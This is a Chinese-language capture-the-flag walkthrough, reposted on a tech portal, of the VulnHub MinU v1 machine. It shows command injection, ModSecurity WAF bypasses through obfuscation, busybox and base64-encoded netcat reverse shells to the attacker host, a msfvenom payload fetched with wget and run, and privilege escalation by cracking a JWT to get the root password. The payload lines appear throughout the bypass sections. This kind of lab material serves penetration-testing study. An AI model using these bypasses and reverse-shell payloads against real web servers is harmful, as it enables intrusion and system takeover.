0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

多种绕过WAF方式获取稳定shell、内部信息收集和提权

马哥Linux运维 来源:freebuf 作者:freebuf 2022-07-07 10:58 次阅读

涉及目录知识点

1.NMAP挖掘信息2.web信息枚举3.绕过WAF(一)识别waf4.绕过WAF(二)模糊测试Fuzz5.绕过WAF(三)6.绕过WAF(四)7.绕过WAF(五)8.稳定shell拓展9.内部信息收集10.提权--深入分析PW文件11.总结

本项目中包含信息收集、信息收集、识别WAF、多种绕过WAF方式、获取稳定shell、内部信息收集和提权,最终拿到flag.txt。其中包含一些小技巧以及知识,都会在文章中展现出来。

注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

靶机下载地址:https://www.vulnhub.com/entry/minu-1,235/

2c67bc06-fd2c-11ec-ba43-dac502259ad0.jpg

下载完成后,使用 VirtualBox 导入,网络选择桥接模式,开启靶机.

2c8075e8-fd2c-11ec-ba43-dac502259ad0.jpg

准备工作完成,可以开始进行渗透了。

渗透测试的本质就是信息收集,

信息搜集的广度决定了攻击的广度,知识面的广度决定了攻击的深度。

1.NMAP挖掘信息

扫描挖掘本地的IP地址信息:

nmap -sS -sV -T5 -A 10.163.197.21

2c94cf70-fd2c-11ec-ba43-dac502259ad0.jpg2ca7d96c-fd2c-11ec-ba43-dac502259ad0.jpg

发现开放了25、80、110端口,25端口为SMTP端口服务,110端口为POP3,80端口扫描出了是乌班图的系统,该apache的版本为2.4.7,接下来访问下http的80端口。

2.web信息枚举

访问80端口

2cb67094-fd2c-11ec-ba43-dac502259ad0.jpg

可以看到是apache的一个初始的服务页面,仅仅只有80端口开了htp服务的话,猜测下面一定是有目录的,所以进行爆破看看。

也可以使用其他爆破目录工具,此处我使用的是dirb,dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。

dirb http://10.163.197.21/

2cc2bcbe-fd2c-11ec-ba43-dac502259ad0.jpg

扫描结果的状态码中大部分都是403,如果大批量出现403,说明前端是存在安全防护机制的,要么是waf要么是防御脚本。上面的爆破只有一个index.html返回的是200,访问发现就是刚才的主页。加大爆破力度。

在很多情况下,我们需要在目标服务器上提取特定扩展名的目录,然后可以使用dirb扫描的-X参数。此参数接受文件扩展名,然后在目标服务器或计算机上搜索给定的扩展名文件。

dirbhttp://10.163.197.21/-X .php .html

2ccd7302-fd2c-11ec-ba43-dac502259ad0.jpg

发现存在一个 test.php。

访问http://10.163.197.21/test.php

2cd86564-fd2c-11ec-ba43-dac502259ad0.jpg

提示:Read last visitor data 读取上次访问者数据。是否存在信息泄露呢,我们点击这个提示。

点击后弹出:http://192.168.3.88/test.php?file=last.html,一般情况下 ?file= 存在文件包含、sql注入。

2ce87a58-fd2c-11ec-ba43-dac502259ad0.jpg

尝试对URL进行构造。

http://10.163.197.21/test.php?file=../../../../../../../etc/passwd

2cf421a0-fd2c-11ec-ba43-dac502259ad0.jpg

结合前面爆破是大部分回显均为403,猜测是存在WAF,尝试命令注入。

2d04bd08-fd2c-11ec-ba43-dac502259ad0.jpg

发现存在命令注入,手工试了一些后,发现ls、cat这些命令无法正常执行,应该是被waf拦截了。

3.绕过WAF(一)识别waf

这里使用一个工具,对waf进行探测 WAFW00F

WAFW00F是一个Web应用防火墙(WAF)指纹识别的工具。

WAFW00F工作原理

1、首先通过发送一个正常http请求,然后观察其返回有没有一些特征字符

2、如果不成功,它将发送大量(潜在的恶意) HTTP 请求,并使用简单的逻辑推断出它是哪个WAF

3、如果这也不成功,它将分析以前返回的响应,并使用另一个简单的算法来猜测 WAF 或安全解决方案是否正在积极响应我们的攻击.

下载地址:https://github.com/EnableSecurity/wafw00f

KALI自带这个工具

wafw00fhttp://10.163.197.21/

2d0bee02-fd2c-11ec-ba43-dac502259ad0.jpg

根据回显,存在waf,但是无法识别出来,当前使用的这个 wafw00f 是新版waf,但是新版反而不是很好用,所以我们再使用旧版的尝试一下。

2d1c7e48-fd2c-11ec-ba43-dac502259ad0.jpg

旧版检测到是一款叫 modsecurity 的waf,是一个开源waf。

规则机制(绕过CRS

WAF可以安装在服务器,可以安装在某个站的目录下,也可以安装在PHP文件内。

https://github.com/SpiderLabs/ModSecurity---开源

https://github.com/SpiderLabs/owasp-modsecurity-crs

ModSecurity是一个开源的跨平台Web应用程序防火墙(WAF)引擎,用于Apache,IIS和Nginx,由Trustwave的SpiderLabs开发。作为WAF产品,ModSecurity专门关注HTTP流量,当发出HTTP请求时,ModSecurity检查请求的所有部分,如果请求是恶意的,它会被阻止和记录。

功能:

SQL Injection (SQLi):阻止SQL注入

Cross Site Scripting (XSS):阻止跨站脚本攻击

Local File Inclusion (LFI):阻止利用本地文件包含漏洞进行攻击

Remote File Inclusione(RFI):阻止利用远程文件包含漏洞进行攻击

Remote Code Execution (RCE):阻止利用远程命令执行漏洞进行攻击

PHP Code Injectiod:阻止PHP代码注入

HTTP Protocol Violations:阻止违反HTTP协议的恶意访问

HTTPoxy:阻止利用远程代理感染漏洞进行攻击

Shellshock:阻止利用Shellshock漏洞进行攻击

Session Fixation:阻止利用Session会话ID不变的漏洞进行攻击

Scanner Detection:阻止黑客扫描网站

Metadata/Error Leakages:阻止源代码/错误信息泄露

Project Honey Pot Blacklist:蜜罐项目黑名单

GeoIP Country Blocking:根据判断IP地址归属地来进行IP阻断

4.绕过WAF(二)模糊测试Fuzz

绕过waf可以尝试进行模糊测试,也就是FUZZ,FUZZ可以应用在很多场景中。

此处我们使用wfuzz工具。

2d283012-fd2c-11ec-ba43-dac502259ad0.jpg

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txthttp://10.163.197.21/test.php?file=FUZZ---正常模糊测试执行命令。

-c 输出颜色 -z payload

这里跑出很多种结果。

2d361de4-fd2c-11ec-ba43-dac502259ad0.jpg

响应值是200的和403的都很多,所以我们进行一下过滤,把403和404的过滤掉,然后重新执行。

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 404,403http://10.163.197.21/test.php?file=FUZZ---加hc过滤。

2d4823d6-fd2c-11ec-ba43-dac502259ad0.jpg

剩下的就都是响应值为200的,此时就可以使用命令测试绕过waf。

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 404,403http://10.163.197.21/test.php?file=FUZZ| grep dir

上面的命令是dir如何可以绕过waf。

2d5643c6-fd2c-11ec-ba43-dac502259ad0.jpg

出示了两种方式,我们进行尝试。

访问http://10.163.197.21/test.php?file=|dir

2d61c6e2-fd2c-11ec-ba43-dac502259ad0.jpg

可以绕过

关于wfuzz的详细使用可以参考:https://blog.csdn.net/qq_17204441/article/details/102279118

通过 | 绕过waf

现在已经可以绕过waf进行命令执行了

5.绕过WAF(三)

分号“;” 隔离绕过waf!

以文件形式去读的时候,加;就可以绕过

http://10.163.197.21/test.php?file=last.html;id

2d6b609e-fd2c-11ec-ba43-dac502259ad0.jpg

因为PHP底下是有过滤器的,因为有过滤器才导致有文件包含,我们用过滤器读取了文件包含下的一个文件。

通过访问 http://10.163.197.21/test.php?file=--version可以看到过滤器的信息。

2d7bd898-fd2c-11ec-ba43-dac502259ad0.jpg

是用cat过滤的,所以要以一个文件开头读取信息,然后再绕过。

但是目前的两种绕过方式都只能执行部分命令,如果命令后面需要跟参数,就不行了。

二进制绕过

可以在不受限制和不同的二进制文件中执行命令来绕过本地安全限制!

这里提供一个包含所有二进制文件的网站:

二进制文件的列表:https://gtfobins.github.io/

最终发现:https://gtfobins.github.io/gtfobins/busybox/可以绕过waf

2d8c619a-fd2c-11ec-ba43-dac502259ad0.jpg

所以根据二进制绕过waf,就可以反弹shell到其他机器上。

http://10.163.197.21/test.php?file=YLion;busyboxnc 10.163.196.91 6789 -e sh

2d9b303a-fd2c-11ec-ba43-dac502259ad0.jpg

此时是没有环境变量的,但是每个二进制文件都包含环境变量,可以添加参数-i。

http://10.163.197.21/test.php?file=YLion;busyboxnc 10.163.196.91 6789 -e sh -i

2da5f8a8-fd2c-11ec-ba43-dac502259ad0.jpg

6.绕过WAF(四)

& --绕waf(URL编码混淆绕过WAF)。

&的url编码为%26 空格的url编码为%20。

&会过滤掉前面的命令,直接执行后面的命令。

2dba675c-fd2c-11ec-ba43-dac502259ad0.jpg

可以执行成功。

这里混淆的话,linux一般都会默认安装base64,所以使用base64加密混淆。

但是base64加密完会包含=,=被waf加入黑名单了,等号和你加密时的空格有关,可以在末尾添加空格,加密后等号就会去掉,如图下中的尝试。

2dcc587c-fd2c-11ec-ba43-dac502259ad0.jpg

&/bin/echo bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2LjkxIDEzMzcK|/usr/bin/base64 -d|/bin/sh

%26/bin/echo bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2LjkxIDEzMzcK|/usr/bin/base64 -d|/bin/sh

此处执行

http://10.163.197.21/test.php?file=%26/bin/echo%20bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2LjkxIDEzMzcK|/usr/bin/base64%20-d|/bin/sh

发现无法执行。

2dda2150-fd2c-11ec-ba43-dac502259ad0.jpg

此时尝试继续绕过,加?号,?问号在linux中以命令使用着,例如:/bin/echo可以通过替换一些字母来调用,/bin/ech?,仍然会执行相同的命令!----在中间件服务里会自动识别命令。

%26/b?n/ec?o bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2LjkxIDEzMzcK|/u?r/b?n/b?se64 -d|/bin/?h

http://10.163.197.21/test.php?file=%26/b?n/ec?o%20bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2LjkxIDEzMzcK|/u?r/b?n/b?se64%20-d|/bin/?h

2de399e2-fd2c-11ec-ba43-dac502259ad0.jpg

成功 总结一下:

1)知道了cat执行命令,那么用&符号:

& 符号url编码是%26,结束并开始一个新的命令!

2)%20 ---空格

3)bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjMuODYgMTMzNyAgICAgICAK ---base64编码

(这里==也在黑名单上)

4)/u?r/b?n/b?se64%20-d是url编码的绕过方法:/usr/bin/base64 -d

5)|/b?n/sh也是一种绕过:|/bin/sh、

7.绕过WAF(五)

$绕过WAF,但是是针对modsecurity这个waf的。

$u 然后执行命令 $u被视为空字符串。

首先我们使用msf生成一个shell。

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.27.187 lport=4455 -f elf > shell

2dec03de-fd2c-11ec-ba43-dac502259ad0.jpg

然后用python开启一个http服务,并且用nc监听4455端口。

2dfb47ea-fd2c-11ec-ba43-dac502259ad0.jpg

http://10.163.197.21/test.php?file=YLion;$u wgethttp://192.168.27.187:80/shell-o /tmp/shell

执行即可成功上传,通过下面的命令查看。

http://10.163.197.21/test.php?file=YLion;$u ls /tmp

可以看到文件存在,查看一下文件权限。

http://10.163.197.21/test.php?file=YLion;$u ls -la /tmp/shell

并且发现权限比较低,所以执行另一条命令。

http://10.163.197.21/test.php?file=YLion;$u chmod 777 /tmp/shell

给予高权限,再次查看。

http://10.163.197.21/test.php?file=YLion;$u ls /tmp

2e05c62a-fd2c-11ec-ba43-dac502259ad0.jpg

权限已经变高了,攻击机上进行监听端口。

nc -vlp 4455

http://10.163.197.21/test.php?file=YLion;$u /tmp/shell

注意:这里存在一个坑,可能大家做到这里会发现,python开启的http服务那里有记录,文件也可以看到,但是没有回显,其实是因为作者挖了一个坑,大家看上面查看文件权限的图片,里面那个0,代表文件大小是0,这是因为文件空间满了,搭建之处空间被占满了,所以只有一个文件空壳,有名字,但是没有内容。所以需要删除一些文件,再重新上传。

总结上述绕过方式:| $ & ; 加上各种混淆base64 ? 等等

8.稳定shell拓展

这里已经拿到shell,这里也有一点,就是这里要输python3,而不是直接python。

python3 -c 'import pty; pty.spawn("/bin/bash")'

2e11c2ea-fd2c-11ec-ba43-dac502259ad0.jpg

SHELL=/bin/bash script -q /dev/null

xport TERM=xterm-256color

ctrl + z

stty raw -echo

fg

执行完成就拿到了稳定shell。

9.内部信息收集

uname -a

2e19c5bc-fd2c-11ec-ba43-dac502259ad0.jpg

由此得知是一个32位的系统。

可以上传一个脚本,然后运行 linpeas.sh 这是一个Linux提权辅助工具。

这个脚本非常厉害,可以枚举linux操作系统几乎所有的可提权项,甚至可以通过su暴力破解本地密码,输出非常多。

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

由于没有空间,可以使用rm -rf命令删除tmp目录下的一些文件,一般tmp目录下为临时文件。

Linux version 4.13.0-39-generic ---45010

Sudo version 1.8.20p2 ---CVE-2021-3156

uid=1000(bob) gid=1000(bob) groups=1000(bob),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare) ---找到bob的密码,su bob登录用sudo -l提权。

在tmp目录下进行查看

ls -la

2e263fcc-fd2c-11ec-ba43-dac502259ad0.jpg

再查看一下home目录下的内容。

2e34d302-fd2c-11ec-ba43-dac502259ad0.jpg

然后在 /home/bob/ 目录下找到一个隐藏文件。

2e438c30-fd2c-11ec-ba43-dac502259ad0.jpg

上面的脚本也会枚举出这个文件。

2e564654-fd2c-11ec-ba43-dac502259ad0.jpg

通过python3,将该文件下载下来。

python3 -m http.server 8089

2e6390c0-fd2c-11ec-ba43-dac502259ad0.jpg

wget http://192.168.2.230:8089/._pw_

2e73825a-fd2c-11ec-ba43-dac502259ad0.jpg

cat ._pw_

2e84b11a-fd2c-11ec-ba43-dac502259ad0.jpg

10.提权--深入分析PW文件

初步怀疑这是一个密码base64加密,但是base64中并没有点,直接尝试解码试试。

2e924a32-fd2c-11ec-ba43-dac502259ad0.jpg

点在base64中代表跳过的意思,前面的部分解出了一些东西。

sha256 类型:JWT

将第一个点号过滤,查看后面的信息。

2ea24fb8-fd2c-11ec-ba43-dac502259ad0.jpg

过滤第二个点号。

2eb2ae62-fd2c-11ec-ba43-dac502259ad0.jpg

是二进制文件。

对已有信息进行解读。

JWT是一种密匙认证机制,类似签名。

JSON Web Token(JWT)是一个开放的行业标准(RFC 7519),它定义了一种简介的、自包含的协议格式,用于在通信双方传递json对象,传递的信息经过数字签名可以被验证和信任。JWT可以使用HMAC算法或使用RSA的公 钥/私钥对来签名,防止被篡改。

2ec3baae-fd2c-11ec-ba43-dac502259ad0.jpg

JWT 具有这种格式的三个部分:

base64(header).base64(payload).base64(signature)

1. header在 JSON 中指定算法和类型。

2. payload指定令牌的声明,也在 JSON 中。

3. signature是编码头和有效载荷的数字签名。

解密提供两种思路,在线解密以及解密工具。

https://jwt.io/#debugger这个网站提供在线解密,但是有些情况是解不出来的,需要使用工具破解。

这里给出两种工具:

https://github.com/brendan-rius/c-jwt-cracker.git

https://github.com/lmammino/jwt-cracker

我们使用第一种

proxychains git clonehttps://github.com/brendan-rius/c-jwt-cracker.git

cd jwt-cracker

apt-get install libssl-dev

make

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

Secret is "mlnV1" ----等待几分钟

2ecee172-fd2c-11ec-ba43-dac502259ad0.jpg

账户root,密码为mlnV1

2edf3720-fd2c-11ec-ba43-dac502259ad0.jpg

root目录下存在flag.txt

2eed3014-fd2c-11ec-ba43-dac502259ad0.jpg

11.总结

本篇文章着重点在于过WAF部分,也对其他的信息手机、提权的等给出了一些思路,希望小伙伴们能实际操作复现一遍!来巩固自身的渗透技术和技巧!

原文标题:红队渗透项目之MinUv1

文章出处:【微信公众号:马哥Linux运维】欢迎添加关注!文章转载请注明出处。

审核编辑:彭静

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    8123

    浏览量

    82534
  • 端口
    +关注

    关注

    4

    文章

    820

    浏览量

    31591
  • WAF
    WAF
    +关注

    关注

    0

    文章

    27

    浏览量

    10416
  • Shell
    +关注

    关注

    1

    文章

    358

    浏览量

    22903

原文标题:红队渗透项目之MinUv1

文章出处:【微信号:magedu-Linux,微信公众号:马哥Linux运维】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    shell是什么?shell实现原理分析基于MM32 MCU的shell脚本源码

    在前两节中,我们讲解了如何在MM32 MCU上使用shell来辅助开发,分别介绍的是通过串口方式和J-Link RTT方式shell,本次课程我们分析源码来讲解
    发表于 12-02 15:58 2253次阅读

    第一代各种Web应用防火墙的缺陷汇总

    很容易绕过检测引擎。b.基于策略:国外厂商比较喜爱,但配置及其复杂,网页个数多的情况下,性能呈几何方式下降。在一个超过30个网站的网络里,几乎不可用。利用一些CMS的漏洞,很容易绕过国外厂商此种
    发表于 09-14 11:07

    怎么绕过内部耦合器

    问候,我一直试图通过绕过测试端口的内部耦合器来提高我的N5230C PNA灵敏度。为实现这一目标,我直接访问了内部微波硬件配置,并通过循环器路由信号。请参阅附件。我没有达到更好的灵敏度,但是我的测量
    发表于 10-22 16:14

    LabVIEW 获取电脑内部信息

    LabVIEW 获取电脑内部信息,可用于软件绑定CUP加密。
    发表于 09-11 13:51

    香港云服务器宝塔windows面板获取系统管理员权限

    用往下看了,下面来说说宝塔windows面板过程。测试系统:windows 2008宝塔windows面板版本:3.1方式:启动项如
    发表于 04-25 01:59

    请教大神adb shell进入如何获取Ip dns网关

    你好:  RK3566C烧录android11后通过adb shell进入系统,无法通过getprop | grep eth1或netcfg类似命令获取通信网卡的ip、dns、网关等信息,出现的异常:请问怎么回事,是命令格式不对
    发表于 08-15 16:32

    如何在usb cdc上获取shell

    我正在尝试在 usb cdc 上获取 shell。 我在 2 年前和 1 年前就看到过,但没有具体的建议/演示/解决方案。 你有关于这个话题的任何更新吗?
    发表于 05-12 08:48

    WAF上传绕过+wbehshell免杀

    WAF上传绕过+wbehshell免杀
    发表于 09-07 10:35 4次下载
    软<b class='flag-5'>WAF</b>上传<b class='flag-5'>绕过</b>+wbehshell免杀

    基于REDIS获取车辆轨迹信息方法

    获取车辆轨迹信息,传回控制中心后存储到本地数据库;另一种是通过与上述这种有条件的企业合作,动态获取他们得到的车辆轨迹信息。 对于不是专门做CPS与车载终端通信的企业来说,一般会选取第
    发表于 11-05 10:04 18次下载
    基于REDIS<b class='flag-5'>获取</b>车辆轨迹<b class='flag-5'>信息</b>方法

    每天收集你个人信息的APP超过1000种

    为什么这些公司要收集你的个人信息?因为它“无价”,更贴切地说你的个人信息有价值。众所周知,互联网时代,数据的价值最大,它堪比工业时代的“石油”。在工业时代,为获取石油,人们不断采掘;到
    的头像 发表于 07-10 14:55 6933次阅读

    Linux中shell脚本执的4种方式

    Linux中shell脚本的执行通常有4种方式,分别为工作目录执行,绝对路径执行,sh执行,shell环境执行。
    发表于 05-23 09:28 802次阅读
    Linux中<b class='flag-5'>shell</b>脚本执的4种<b class='flag-5'>方式</b>

    微博 App 违法违规收集使用个人信息内部整改

    使用方面的问题,微博对此深表歉意,正进行内部整改。 微博管理员介绍,11 月 14 日 App 违法违规收集使用个人信息治理工作组发布通告,显示微博 APP 存在两个 个人信息
    的头像 发表于 11-19 14:21 2157次阅读

    用来获取linux系统信息shell脚本

    一、脚本 今天主要分享一个shell脚本,用来获取linux系统CPU、内存、磁盘IO等信息。 #!/bin/bash# 获取要监控的本地服务器IP地址 IP=`ifconfig |
    的头像 发表于 08-25 16:00 4874次阅读

    获取USB设备信息方式介绍

    如果只是重写nativeEvent是不够的,并不能获取到设备信息,只能识别热插拔状态。要识别USB设备信息需要用到GUID,先定义设备的GUID,再注册设备,注册完成后才能获取对应设备
    发表于 07-29 16:52 3741次阅读

    Linux服务器信息收集脚本

    主要收集服务器系统版本、IP地址、ARP连接、路由信息、密码信息、历史命令、当前权限、网络连接、进程信息、服务信息、SSH登录
    的头像 发表于 12-05 10:07 582次阅读